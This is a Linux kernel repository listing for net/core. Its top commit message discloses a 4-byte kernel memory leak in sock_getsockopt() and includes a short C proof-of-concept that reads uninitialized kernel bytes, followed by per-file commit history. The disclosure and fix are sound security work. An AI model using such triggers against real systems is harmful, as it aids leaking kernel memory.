linux/net/core
Clément Lecigne df0bca049d net: 4 bytes kernel memory disclosure in SO_BSDCOMPAT gsopt try #2
In function sock_getsockopt() located in net/core/sock.c, optval v.val
is not correctly initialized and is directly returned to userland in case
we have the SO_BSDCOMPAT option set.

This dummy code should trigger the bug:

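#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>

int main(void)
{
	unsigned char buf[4] = { 0, 0, 0, 0 };
	socklen_t len = sizeof(buf);	/* getsockopt() reads this as the buffer size */
	int sock;

	sock = socket(33, 2, 2);
	getsockopt(sock, 1, SO_BSDCOMPAT, &buf, &len);
	/* on an unpatched kernel these bytes are the uninitialized v.val */
	printf("%x%x%x%x\n", buf[0], buf[1], buf[2], buf[3]);
	close(sock);
	return 0;
}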

Here is a patch that fixes this bug by initializing v.val just after its
declaration.

Signed-off-by: Clément Lecigne <clement.lecigne@netasq.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-02-12 16:59:09 -08:00
datagram.c net: sk_free_datagram() should use sk_mem_reclaim_partial() 2008-11-05 01:38:06 -08:00
dev_mcast.c net: Rationalise email address: Network Specific Parts 2008-10-13 19:01:08 -07:00
dev.c net_dma: call dmaengine_get only if NET_DMA enabled 2009-02-06 22:06:43 -08:00
dst.c net: speedup dst_release() 2008-11-14 00:53:54 -08:00
ethtool.c ethtool: Add GGRO and SGRO ops 2008-12-15 23:44:31 -08:00
fib_rules.c net: fib_rules ordering fixes. 2008-11-07 22:52:34 -08:00
filter.c filter: add SKF_AD_NLATTR_NEST to look for nested attributes 2008-11-20 00:49:27 -08:00
flow.c netns xfrm: lookup in netns 2008-11-25 17:35:18 -08:00
gen_estimator.c pkt_sched: gen_estimator: Optimize gen_estimator_active() 2008-11-26 15:24:32 -08:00
gen_stats.c [NET_SCHED]: Convert packet schedulers from rtnetlink to new netlink API 2008-01-28 15:11:10 -08:00
iovec.c net: Use standard structures for generic socket address structures. 2008-07-19 22:35:47 -07:00
kmap_skb.h [PATCH] severing skbuff.h -> highmem.h 2006-12-04 02:00:29 -05:00
link_watch.c Revert "net: Fix for initial link state in 2.6.28" 2009-01-05 16:01:51 -08:00
Makefile net: Add SKB DMA mapping helper functions. 2008-09-11 04:51:14 -07:00
neighbour.c neigh: some entries can be skipped during dumping 2009-02-06 00:52:04 -08:00
net_namespace.c NET: net_namespace, fix lock imbalance 2009-01-20 14:39:31 -08:00
net-sysfs.c netns: filter out uevent not belonging to init_net 2008-11-25 16:46:37 -08:00
net-sysfs.h netns: Fix device renaming for sysfs 2008-05-02 17:00:58 -07:00
netevent.c [NET]: net/core/netevent.c should #include <net/netevent.h> 2007-07-05 17:40:27 -07:00
netpoll.c Merge branch 'master' of master.kernel.org:/pub/scm/linux/kernel/git/davem/net-2.6 2008-12-15 20:03:50 -08:00
pktgen.c netns xfrm: finding states in netns 2008-11-25 17:31:51 -08:00
request_sock.c net: convert BUG_TRAP to generic WARN_ON 2008-07-25 21:43:18 -07:00
rtnetlink.c netdev: introduce dev_get_stats() 2008-11-19 21:40:23 -08:00
scm.c Merge branch 'master' into next 2008-11-18 18:52:37 +11:00
skb_dma_map.c net: Fix off-by-one in skb_dma_map 2008-10-12 21:07:34 -07:00
skbuff.c net: Fix OOPS in skb_seq_read(). 2009-01-29 16:12:42 -08:00
sock.c net: 4 bytes kernel memory disclosure in SO_BSDCOMPAT gsopt try #2 2009-02-12 16:59:09 -08:00
stream.c net: Rationalise email address: Network Specific Parts 2008-10-13 19:01:08 -07:00
sysctl_net_core.c netns xfrm: per-netns sysctls 2008-11-25 18:00:48 -08:00
user_dma.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6 2008-07-26 20:17:56 -07:00
utils.c printk ratelimiting rewrite 2008-07-25 10:53:29 -07:00